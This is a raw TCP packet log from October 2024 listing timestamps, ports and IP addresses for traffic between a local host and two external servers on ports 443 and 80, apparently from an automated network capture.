Oct 27, 2024 17:11:18.102277040 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.104141951 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.104193926 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.104274035 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.104361057 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.104388952 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.135184050 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.135591984 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.135643959 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.136001110 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.136017084 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.205478907 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.205801010 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.205812931 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.206166029 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.206171036 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.270230055 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.270371914 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.270426989 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.270498991 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.270519018 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.270530939 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.270538092 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.273144960 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.273171902 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.273233891 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.273354053 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.273369074 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.297368050 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.297759056 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.297797918 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.298176050 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.298187017 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.339986086 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.340131044 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.340193987 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.340221882 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.340234041 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.340243101 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.340248108 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.342134953 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.342164993 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.342231035 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.342371941 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.342386007 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.431637049 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.431781054 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.431845903 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.431906939 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.431924105 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.431937933 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.431943893 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.433821917 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.433841944 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.433916092 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.434037924 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.434048891 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.865592957 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.866400003 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.866457939 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.866816998 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.866832018 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.955905914 CET	80	57808	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:18.955990076 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.997858047 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.998226881 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.998253107 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.998574972 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.998586893 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.998999119 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.999090910 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.999160051 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.999236107 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.999236107 CET	57810	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.999273062 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.999298096 CET	443	57810	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.001601934 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.001642942 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.001724958 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.001844883 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.001861095 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.010756969 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.011051893 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.011085987 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.011383057 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.011393070 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.091063976 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.091387033 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.091409922 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.091731071 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.091742039 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.132273912 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.132448912 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.132519960 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.132586956 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.132586956 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.132616997 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.132641077 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.134691954 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.134728909 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.134809017 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.134903908 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.134916067 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.142162085 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.142210007 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.142263889 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.142388105 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.142388105 CET	57811	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.142404079 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.142424107 CET	443	57811	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.144223928 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.144263029 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.144359112 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.144464016 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.144479990 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.188692093 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.189086914 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.189107895 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.189532042 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.189538002 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.222848892 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.222909927 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.222970009 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.223002911 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.223033905 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.223094940 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.223303080 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.223347902 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.223382950 CET	57812	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.223397970 CET	443	57812	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.232501030 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.232541084 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.232598066 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.232805967 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.232824087 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.324675083 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.324871063 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.324945927 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.324990988 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.325010061 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.325021982 CET	57813	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.325028896 CET	443	57813	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.327159882 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.327229977 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.327307940 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.327445984 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.327467918 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.738794088 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.739324093 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.739357948 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:19.739795923 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:19.739801884 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.191968918 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.192044973 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.192152023 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.192281961 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.192281961 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.193636894 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.202620029 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.203257084 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.203999996 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.204044104 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.204428911 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.204435110 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.204600096 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.204644918 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.204696894 CET	57814	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.204713106 CET	443	57814	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.205502033 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.205562115 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.205827951 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.205841064 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.206298113 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.206319094 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.206598997 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.206604004 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.208216906 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.208246946 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.208321095 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.208445072 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.208455086 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.329998016 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.330677032 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.330738068 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.330867052 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.331065893 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.331084967 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.331099033 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.331152916 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.331207037 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.331228018 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.331239939 CET	57815	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.331245899 CET	443	57815	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.333786011 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.333873987 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.333934069 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.334153891 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.334189892 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.335623026 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.335671902 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.335726976 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.335845947 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.335846901 CET	57816	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.335877895 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.335902929 CET	443	57816	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.337934971 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.338016987 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.338083029 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.338233948 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.338268042 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459228992 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459485054 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459557056 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.459582090 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459614038 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459666014 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.459707975 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.459729910 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.459752083 CET	57818	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.459764957 CET	443	57818	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.461915970 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.461937904 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.462009907 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.462157011 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.462171078 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.482244968 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.482405901 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.482462883 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.482496977 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.482513905 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.482526064 CET	57817	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.482534885 CET	443	57817	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.484630108 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.484711885 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.484817028 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.484957933 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.484994888 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.585161924 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:20.585432053 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:20.590939045 CET	80	57824	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:20.591000080 CET	80	57808	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:20.591005087 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:20.591064930 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:20.591247082 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:20.596679926 CET	80	57824	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:20.965516090 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.966001034 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.966012001 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:20.966449976 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:20.966455936 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.074886084 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.075388908 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.075462103 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.075766087 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.075781107 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.092071056 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.092407942 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.092464924 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.092750072 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.092777014 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.099481106 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.099630117 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.099689007 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.099711895 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.099730015 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.099740982 CET	57819	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.099750042 CET	443	57819	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.102049112 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.102118015 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.102320910 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.102320910 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.102387905 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.192152023 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.192507982 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.192553043 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.192924976 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.192935944 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.205306053 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.205473900 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.205544949 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.205614090 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.205614090 CET	57820	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.205651045 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.205673933 CET	443	57820	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.208038092 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.208129883 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.208215952 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.208323002 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.208354950 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.226114035 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.226250887 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.226315975 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.226370096 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.226370096 CET	57821	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.226404905 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.226428986 CET	443	57821	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.228241920 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.228259087 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.228323936 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.228523016 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.228537083 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.235824108 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.236160040 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.236197948 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.236567020 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.236578941 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321413994 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321485043 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321536064 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.321557045 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321595907 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321657896 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.321748018 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.321769953 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.321793079 CET	57822	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.321820974 CET	443	57822	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.323811054 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.323909998 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.323992968 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.324114084 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.324142933 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.369474888 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.369631052 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.369782925 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.369833946 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.369833946 CET	57823	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.369865894 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.369888067 CET	443	57823	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.371768951 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.371799946 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.371872902 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.371999025 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.372014046 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.495649099 CET	80	57824	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:21.497133970 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:21.841887951 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.893002033 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.893028975 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.893341064 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:21.893352032 CET	443	57825	13.107.246.51	192.168.2.4
